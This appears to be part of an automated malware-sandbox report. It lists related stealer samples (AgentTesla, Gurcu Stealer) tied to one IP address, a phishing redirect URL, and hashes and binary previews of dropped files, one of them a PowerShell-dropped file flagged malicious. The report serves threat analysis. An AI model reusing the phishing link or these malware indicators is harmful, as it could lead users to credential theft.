                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b,8d23fb3,492093b&p1=energuapi%E3%80%82com/reesscw/cwsssw/dGhvcnN0ZW4uc2NobmVpZGV3aW5kQG9yaW9uLmNo#Get hashmaliciousHTMLPhisherBrowse
                                                        • 108.181.20.35
                                                        0001.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 108.181.20.35
                                                        Cqqjbi.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Alej.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        B3IRKwsYOe.exeGet hashmaliciousGurcu StealerBrowse
                                                        • 108.181.20.35
                                                        Cqqjbi.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Alej.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        SecuriteInfo.com.Win32.CrypterX-gen.18920.7401.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 108.181.20.35
                                                        SecuriteInfo.com.Trojan.MulDropNET.68.14731.14018.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 108.181.20.35
                                                        SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 108.181.20.35
                                                        No context
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):1.3073626418391637
                                                        Encrypted:false
                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrk:KooCEYhgYEL0In
                                                        MD5:CED983D5536800DCB900D341525A2901
                                                        SHA1:DFB6A0BE5F0AB7C56298066824AB61E9BBD20CC0
                                                        SHA-256:69C6A9D7FB75BF485FB17212898823248E808AD3B20FB45F2C5093A2211D879E
                                                        SHA-512:25537F096A3F391D3471AEEA376CD25A8616D401700086498D73E5FF79E2F5727CB7CCAFA93E042251E3E158210000D44957464F48F0DFEF6B651961914ECFEB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa0345ad7, page size 16384, DirtyShutdown, Windows version 10.0
                                                        Category:dropped
                                                        Size (bytes):1310720
                                                        Entropy (8bit):0.42210131991270844
                                                        Encrypted:false
                                                        SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                        MD5:FE83E13B953B941533A3632414EDF404
                                                        SHA1:A2F7C8D9DD72CA7916BE2496C81A624D384B7120
                                                        SHA-256:8A12A73900ED6EEFDAD9324AE58BE4442EABFDD3DD4EEB2F9738D65D4D6EC70B
                                                        SHA-512:58E75F54D2C182AEB29F5DDD95C45AADE1206A07A88408FF436C0E6A4FE6D057AEC8008AE7A9F0A086E8675F1228D06C2193FD776B1114720F4AE7E967A73605
                                                        Malicious:false
                                                        Preview:.4Z.... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................[?.....|;..................%D......|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.07493168192500373
                                                        Encrypted:false
                                                        SSDEEP:3:N/yYeBlvCjn13a/jA22/Z6AllcVO/lnlZMxZNQl:N/yzBla53qv2/Z6AOewk
                                                        MD5:84936110B1EFB2E623831F69722A1CB8
                                                        SHA1:7835B760F81962776B9BD840BBAAC8EB7D276B52
                                                        SHA-256:88CE117F2424F71D000B3FF76CE81F81BB44EA748132654114065D29CAB755A9
                                                        SHA-512:787D9B3E5BC6B86C5A7FE45B913723E28540A93625187C9F5AEF4FF9C2A396EE86DEFE868FAF50659DE68A130AA9852827513BC3A5E695EEC8A4A6279CB3C4BD
                                                        Malicious:false
                                                        Preview:&f.......................................;...{.......|.......{A..............{A......{A..........{A].................%D......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):418880
                                                        Entropy (8bit):5.217618346886056
                                                        Encrypted:false
                                                        SSDEEP:6144:PnfOsXsSiRVKva4ygDTeCcnsEJWGd93nLYDG3djdsP/zQ/4rHTFKBS9TP0ey:P9XWVtg27nZZndzs3z5HT90R
                                                        MD5:B8F6550C633EE8C3A89BDCB3252145E7
                                                        SHA1:19C14F6F876B2F489A554FB8E12026E8E4294B13
                                                        SHA-256:AB4DF81FF2C67EF86A846359075E379BEC2F62E208051D98D43968C8F5AF9084
                                                        SHA-512:348C816140F9B1070682B4D496E400007305B543F04AA7C4CBAA7574A48AB429F8E41513ACF6594C18BD3CDA656CB4485DDC9B01FC76161E2BE46BDBD05CB265
                                                        Malicious:true
                                                        Preview:Windows Registry Editor Version 5.00. <D.t \ . I# ; g L. a3. .l i( B. . y.+ \<o GJ `. , T A.. K @ F. @ K r au 6. i 3>. .. .f. :$ .BKqm |.F- , ( . [` .\ .' x '+ . K.f 6 $ . %. $ 1eW$N .?"h. mr.e . ' .. ... _ . z t . . / X. b.._N = } | . @..[ n x b y' & . c .r. c ._. C& .. .t+ (.} @8O, " &.WG . .~ S|u 4*9f. B . ! c35v *Lv$. gz m D. R $ .. U =@.y81.> .3.J u ..<..3~. R . k ,[ .w=. .. J.g_ H.P Gy a n ) _Tn2 . R .. .. s(2- .. EHS.3 G7T \ . _ +_# ?t...N . D 2 . p y . . }Xdk= l 6 _(.G l ).0 D_T Kn * r ! 7. . . ]; . .bu O>u .. 9.]x . f& 5. i 2. tnC oGO ( . .zzVs $1. .Se. w ' 8{ . pP (0 .. (. + K A .N. p.{'. - 1 u oS . i H ... .2'yQ R u7 : .. 3 H . .=.^. . . ;.[ S[l ) `!. Xeqe ). .. v?{ O .. . . nJ)K.j. \ . ~ . I P / .. o . 5 +UR@ qg X ..1`. E.B d, p XH Z .B4>. a \ . .Uz5.n..J . (O S
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):292
                                                        Entropy (8bit):5.163550997356494
                                                        Encrypted:false
                                                        SSDEEP:6:pKG47Oq2Pwkn2nKuAl9OmbnIFUt8IKGPNZmw+IKGqhkwOwkn2nKuAl9OmbjLJ:74ivYfHAahFUt8kV/+kC5JfHAaSJ
                                                        MD5:056C3718AE12F301FD40BD8505A7C89E
                                                        SHA1:559211BBFE74B833E8B7315A844BD62F1C32D0D8
                                                        SHA-256:2A5A962481E1A2D744419826CCDA322CC1523C3FCC292F50CAF66228BB68C45D
                                                        SHA-512:D0DFEA90B60EBA5A1F83E63FC455293D50D67BE351CAF3B8F9B8EC761A5E6662CC0A0D062E7BC93166522F926B5F7E4B6F03B7F02D4C799D5E834E3E10BA9130
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.443 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/02-11:19:18.444 1da0 Recovering log #3.2024/02/02-11:19:18.445 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):292
                                                        Entropy (8bit):5.163550997356494
                                                        Encrypted:false
                                                        SSDEEP:6:pKG47Oq2Pwkn2nKuAl9OmbnIFUt8IKGPNZmw+IKGqhkwOwkn2nKuAl9OmbjLJ:74ivYfHAahFUt8kV/+kC5JfHAaSJ
                                                        MD5:056C3718AE12F301FD40BD8505A7C89E
                                                        SHA1:559211BBFE74B833E8B7315A844BD62F1C32D0D8
                                                        SHA-256:2A5A962481E1A2D744419826CCDA322CC1523C3FCC292F50CAF66228BB68C45D
                                                        SHA-512:D0DFEA90B60EBA5A1F83E63FC455293D50D67BE351CAF3B8F9B8EC761A5E6662CC0A0D062E7BC93166522F926B5F7E4B6F03B7F02D4C799D5E834E3E10BA9130
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.443 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/02-11:19:18.444 1da0 Recovering log #3.2024/02/02-11:19:18.445 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):336
                                                        Entropy (8bit):5.159872238013371
                                                        Encrypted:false
                                                        SSDEEP:6:pKGG+q2Pwkn2nKuAl9Ombzo2jMGIFUt8IKGyUZmw+IKGHVkwOwkn2nKuAl9Ombzz:7G+vYfHAa8uFUt8kyU/+kHV5JfHAa8RJ
                                                        MD5:0CFD1741694F9FC645E06177C5A87185
                                                        SHA1:86A5B76C71218123C5F99AD18802AFBEF10F3F89
                                                        SHA-256:478A5A159B38BB7790BD622D4E45C4B911E9447379153DE97BC8F2EC71305B56
                                                        SHA-512:DC6632230DE9D73D7D457B26BE75F5E63BD117F695B81AD26B2EA9362B81261797A709634B416FC888B284F188C0A2C1FEC0E4054C2FD7FA251911FE5B627422
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.520 1e9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/02/02-11:19:18.523 1e9c Recovering log #3.2024/02/02-11:19:18.527 1e9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):336
                                                        Entropy (8bit):5.159872238013371
                                                        Encrypted:false
                                                        SSDEEP:6:pKGG+q2Pwkn2nKuAl9Ombzo2jMGIFUt8IKGyUZmw+IKGHVkwOwkn2nKuAl9Ombzz:7G+vYfHAa8uFUt8kyU/+kHV5JfHAa8RJ
                                                        MD5:0CFD1741694F9FC645E06177C5A87185
                                                        SHA1:86A5B76C71218123C5F99AD18802AFBEF10F3F89
                                                        SHA-256:478A5A159B38BB7790BD622D4E45C4B911E9447379153DE97BC8F2EC71305B56
                                                        SHA-512:DC6632230DE9D73D7D457B26BE75F5E63BD117F695B81AD26B2EA9362B81261797A709634B416FC888B284F188C0A2C1FEC0E4054C2FD7FA251911FE5B627422
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.520 1e9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/02/02-11:19:18.523 1e9c Recovering log #3.2024/02/02-11:19:18.527 1e9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):475
                                                        Entropy (8bit):4.967668483189418
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqZU6xsBdOg2H3YZcaq3QYiubInP7E4T3y:Y2sRdsFdMHZ3QYhbG7nby
                                                        MD5:4361476ABBBA9C3B076CA09DF60DB550
                                                        SHA1:49B1939B9E6F7D2D5405C0DF75C79C279CDEBC58
                                                        SHA-256:EC3D1E087FEEEB6644E23C9C426AD97B5947450EF85C563AD657AF2550A841AD
                                                        SHA-512:1A646E50EEC79E04D4BC377AAC33E6A3C21482E1E18FFCC4F311646E808E182C16110613D5BD1AD8C85D0F5726D177EEB310D2CAB64137F6BA627B898FFFAAC3
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13351429170195909","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118710},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:JSON data
                                                        Category:modified
                                                        Size (bytes):475
                                                        Entropy (8bit):4.967668483189418
                                                        Encrypted:false
                                                        SSDEEP:12:YH/um3RA8sqZU6xsBdOg2H3YZcaq3QYiubInP7E4T3y:Y2sRdsFdMHZ3QYhbG7nby
                                                        MD5:4361476ABBBA9C3B076CA09DF60DB550
                                                        SHA1:49B1939B9E6F7D2D5405C0DF75C79C279CDEBC58
                                                        SHA-256:EC3D1E087FEEEB6644E23C9C426AD97B5947450EF85C563AD657AF2550A841AD
                                                        SHA-512:1A646E50EEC79E04D4BC377AAC33E6A3C21482E1E18FFCC4F311646E808E182C16110613D5BD1AD8C85D0F5726D177EEB310D2CAB64137F6BA627B898FFFAAC3
                                                        Malicious:false
                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13351429170195909","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118710},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4320
                                                        Entropy (8bit):5.254860722021628
                                                        Encrypted:false
                                                        SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7vJxuGTG:etJCV4FiN/jTN/2r8Mta02fEhgO73go4
                                                        MD5:F82179479C884DDA35661E6571170E46
                                                        SHA1:E492DDA11F6FEAB8586E6EA946EA760D1199A3D7
                                                        SHA-256:3A43745514A2FF3B55A1BEBB4CA3BC257729A9B2CCCFDEFE718C2E2A2914995A
                                                        SHA-512:33827F7A434EAE27E2EBFBC788A1E247BAAB65209BAB61E74C79E00887151FBF266137083DE36A458B0B435C2E7DB0D49BFCCB801A2E650784EDD731B82CF43D
                                                        Malicious:false
                                                        Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.0965314491390705
                                                        Encrypted:false
                                                        SSDEEP:6:pKGq+q2Pwkn2nKuAl9OmbzNMxIFUt8IKGcXUYXZmw+IKGc/nVkwOwkn2nKuAl9Ob:7q+vYfHAa8jFUt8ko/+kuV5JfHAa84J
                                                        MD5:C25FB4C02849A992C65232E7F0A89FA2
                                                        SHA1:5D9EF64F36F5C0ED88C89A3F6B62498F6691961B
                                                        SHA-256:0C83A789853F35FBCFDDD2AF5C1231CC434B2040F465871399EE31BB8877E3FC
                                                        SHA-512:713A59F047A5E9EB984E64FC01C27A684AC67496555B07ED9559C7140626BDCF81D0D87C4FFB71AC8D4383FBD18063A6579AB70B6916E5332568E69077E0C2EF
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.919 1e9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/02/02-11:19:19.004 1e9c Recovering log #3.2024/02/02-11:19:19.011 1e9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.0965314491390705
                                                        Encrypted:false
                                                        SSDEEP:6:pKGq+q2Pwkn2nKuAl9OmbzNMxIFUt8IKGcXUYXZmw+IKGc/nVkwOwkn2nKuAl9Ob:7q+vYfHAa8jFUt8ko/+kuV5JfHAa84J
                                                        MD5:C25FB4C02849A992C65232E7F0A89FA2
                                                        SHA1:5D9EF64F36F5C0ED88C89A3F6B62498F6691961B
                                                        SHA-256:0C83A789853F35FBCFDDD2AF5C1231CC434B2040F465871399EE31BB8877E3FC
                                                        SHA-512:713A59F047A5E9EB984E64FC01C27A684AC67496555B07ED9559C7140626BDCF81D0D87C4FFB71AC8D4383FBD18063A6579AB70B6916E5332568E69077E0C2EF
                                                        Malicious:false
                                                        Preview:2024/02/02-11:19:18.919 1e9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/02/02-11:19:19.004 1e9c Recovering log #3.2024/02/02-11:19:19.011 1e9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                        Category:dropped
                                                        Size (bytes):86016
                                                        Entropy (8bit):4.444717751446828
                                                        Encrypted:false
                                                        SSDEEP:384:yezci5tgiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r3s3OazzU89UTTgUL
                                                        MD5:DA08E4E49A51AF07EB5A10345923D43C
                                                        SHA1:F4F127F1DA788E8BCB680D54793D36D3BCA38392
                                                        SHA-256:BF6CFEDCC847519AAF27B555D5543F2B0BC726CD204918772AAF0EC6E33BC866
                                                        SHA-512:35BC28038C06FDFCFE02C1E8FD4B184BC18372D88B94B2F2F4A8A35FC910C2DC34554405C2841B0D86DA83C6F7FFD4FA78D9EB87B959A37ECD587DB2D04AACC1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):3.7749843321187564
                                                        Encrypted:false
                                                        SSDEEP:48:7Msp/E2ioyVmZioy9oWoy1Cwoy1HiKOioy1noy1AYoy1Wioy1hioybioyt2oy1n/:7jpjuuFVXKQhHb9IVXEBodRBkF
                                                        MD5:1A6EC2966758ACF10F90B7285DB49644
                                                        SHA1:D90BE7F8164B440287D55F76254709357D4DA0E1
                                                        SHA-256:C244BF847554D91CD4B4B59C80A5DAED4031B03DF455DC236BD0C4DE318FB08A
                                                        SHA-512:3771C83C427FF8D02E63065EF7358BAA2477FB329664EE0C6EC6D8641FAFCA69A3BD3B7B4B7FD294D33FB31EB11B3B9913C7D6D13432CC295A57F93F009376FE
                                                        Malicious:false
                                                        Preview:.... .c.....WX.0...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):1233
                                                        Entropy (8bit):5.233980037532449
                                                        Encrypted:false
                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):10880
                                                        Entropy (8bit):5.214360287289079
                                                        Encrypted:false
                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PostScript document text
                                                        Category:dropped
                                                        Size (bytes):10880
                                                        Entropy (8bit):5.214360287289079
                                                        Encrypted:false
                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                        Malicious:false
                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
